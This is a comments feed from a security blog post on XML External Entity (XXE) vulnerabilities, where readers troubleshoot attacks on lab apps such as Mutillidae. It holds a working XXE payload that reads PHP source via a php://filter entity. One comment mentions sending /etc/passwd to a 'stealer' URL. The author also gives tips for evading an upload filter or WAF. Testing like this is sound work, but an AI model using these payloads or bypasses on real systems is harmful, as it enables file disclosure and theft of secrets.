tag:blogger.com,1999:blog-5696563284753666742.post3162475396194218393..comments2023-12-01T23:54:48.780-05:00Comments on h3xStream's blog: Identifying Xml eXternal Entity vulnerability (XXE)Philippe Arteauhttp://www.blogger.com/profile/12830184811509526452noreply@blogger.comBlogger13125tag:blogger.com,1999:blog-5696563284753666742.post-50908072798939312192016-03-07T01:05:17.318-05:002016-03-07T01:05:17.318-05:00I have used your application which was mentioned a...I have used your application which was mentioned and also used bWapp and mutillidae always I am getting parse error in simplexml_lod_file(). The vulnerable application is making connecting to my server but when it try to parse the dtd/xml file it shows error. Can you pls help how to resolve this. Could not figure what I am doing wrong.<br /><br />this is error file <br /><br />Warning: simplexml_load_file(): xxe.xml:4: parser error : xmlParsePEReference: no name in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): % dtd;]> in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): ^ in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): xxe.xml:4: parser error : internal error in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): % dtd;]> in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): ^ in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): xxe.xml:4: parser error : DOCTYPE improperly terminated in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): % dtd;]> in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): ^ in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): xxe.xml:4: parser error : Start tag expected, '<' not found in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): % dtd;]> in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Warning: simplexml_load_file(): ^ in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5<br /><br />Notice: Trying to get property of non-object in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 6<br /><br />Warning: Invalid argument supplied for foreach() in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 6Anonymoushttps://www.blogger.com/profile/15681580466000243600noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-66627279501042841622015-06-15T23:51:50.620-04:002015-06-15T23:51:50.620-04:00The URL is most likely invalid because of the newl...The URL is most likely invalid because of the newline character place right after the first line of text.<br />Have you tried the base64 encoder trick? See Kamil comment above. It is only possible with PHP environment.Philippe Arteauhttps://www.blogger.com/profile/12830184811509526452noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-92188894737630980222015-06-15T23:49:33.765-04:002015-06-15T23:49:33.765-04:00Can you upload your XML files to a site like paste...Can you upload your XML files to a site like pastebin or github gist ?Philippe Arteauhttps://www.blogger.com/profile/12830184811509526452noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-6280012316979818412015-06-15T23:07:41.185-04:002015-06-15T23:07:41.185-04:00This comment has been removed by the author.adrian ishttps://www.blogger.com/profile/06107604678086048915noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-61055812233291298542015-06-15T22:47:49.833-04:002015-06-15T22:47:49.833-04:00This comment has been removed by the author.adrian ishttps://www.blogger.com/profile/06107604678086048915noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-46825211015843528062015-02-01T23:19:35.402-05:002015-02-01T23:19:35.402-05:00"Identifier is not initialized" may refe..."Identifier is not initialized" may refer to your entity not being loaded. Make sure your resource path (resource=/...) point to a _file_.<br /><br />php://filter/convert.base64-encode/resource=/var/www/vhosts/SiteOnServer/httpdocs/index.php<br /><br />The directory listing trick will only work on Java applications.<br /><br />Good luck!Philippe Arteauhttps://www.blogger.com/profile/12830184811509526452noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-78131684904909120952015-01-08T13:24:12.409-05:002015-01-08T13:24:12.409-05:00Here you are: http://pastebin.com/dtZf8FfXHere you are: http://pastebin.com/dtZf8FfXKamil Vavrahttps://www.blogger.com/profile/01374085524845403613noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-14846752950237695942015-01-08T12:29:21.016-05:002015-01-08T12:29:21.016-05:00is there a way to test this technique locally? do ...is there a way to test this technique locally? do you know a vulnerable application that i can install locally and test with? many thanksAliciahttps://www.blogger.com/profile/15469440684624526146noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-18593220500014842402015-01-01T23:30:09.932-05:002015-01-01T23:30:09.932-05:00Interesting.. I would try to detect if this is an ...Interesting.. I would try to detect if this is an antivirus, a web application firewall or a custom filter from the application.<br /><br />Few things to try<br />1. Try an empty doctype (If it fails again, the parser probably throw an exception to the application when any doctype is specify.)<br />2. Try to submit a EICAR test file or similar obvious malicious binaries.<br />3. Try upcase variations on keywords, encoding variations, etc. (WAF bypass)<br />4. Try pointing to an entity a domain name from which you control the DNS server. (see if the host get resolve)Philippe Arteauhttps://www.blogger.com/profile/12830184811509526452noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-21380534264670186482015-01-01T15:12:44.215-05:002015-01-01T15:12:44.215-05:00Hi, Great article, I'm trying the same techniq...Hi, Great article, I'm trying the same technique but the uploader's response was that the file contains a virus, and rejects it, do you know of a way to evade this form of protection.elevenhttps://www.blogger.com/profile/12904223956188815134noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-76387655297666832542014-09-13T01:19:29.357-04:002014-09-13T01:19:29.357-04:00Have you tried the PHP base64 filter? See Kamil co...Have you tried the PHP base64 filter? See Kamil comment for a quick example.Philippe Arteauhttps://www.blogger.com/profile/12830184811509526452noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-58483475311754687352014-08-29T23:30:26.570-04:002014-08-29T23:30:26.570-04:00hi! i am trying this on multilidae . i using http ...hi! i am trying this on multilidae . i using http rather gopher to send the file:///etc/passwd. but i got this error "Invalid URI: https://localhost/stealer/indexs.php?token=root:x:0:0"adrian ishttps://www.blogger.com/profile/06107604678086048915noreply@blogger.comtag:blogger.com,1999:blog-5696563284753666742.post-63515739150888926392014-06-28T16:54:56.177-04:002014-06-28T16:54:56.177-04:00Thank you for this writeup. You can also read .php...Thank you for this writeup. You can also read .php source code, for example:<br /><br /><!DOCTYPE trk [<br /><!ENTITY entity SYSTEM "php://filter/convert.base64-encode/resource=index.php"><br />]><br /><gpx creator="GPS Visualizer http://www.gpsvisualizer.com/" version="1.0"><br /> <trk><br /> <name>&entity;</name><br /> <trkseg><br /> <trkpt lat="45.4431641" lon="-121.7295456"></trkpt><br /> <trkpt lat="45.4428615" lon="-121.7290800"></trkpt><br /> <trkpt lat="45.4425697" lon="-121.7279085"></trkpt><br /> </trkseg><br /> </trk><br /></gpx>Kamil Vavrahttps://www.blogger.com/profile/01374085524845403613noreply@blogger.com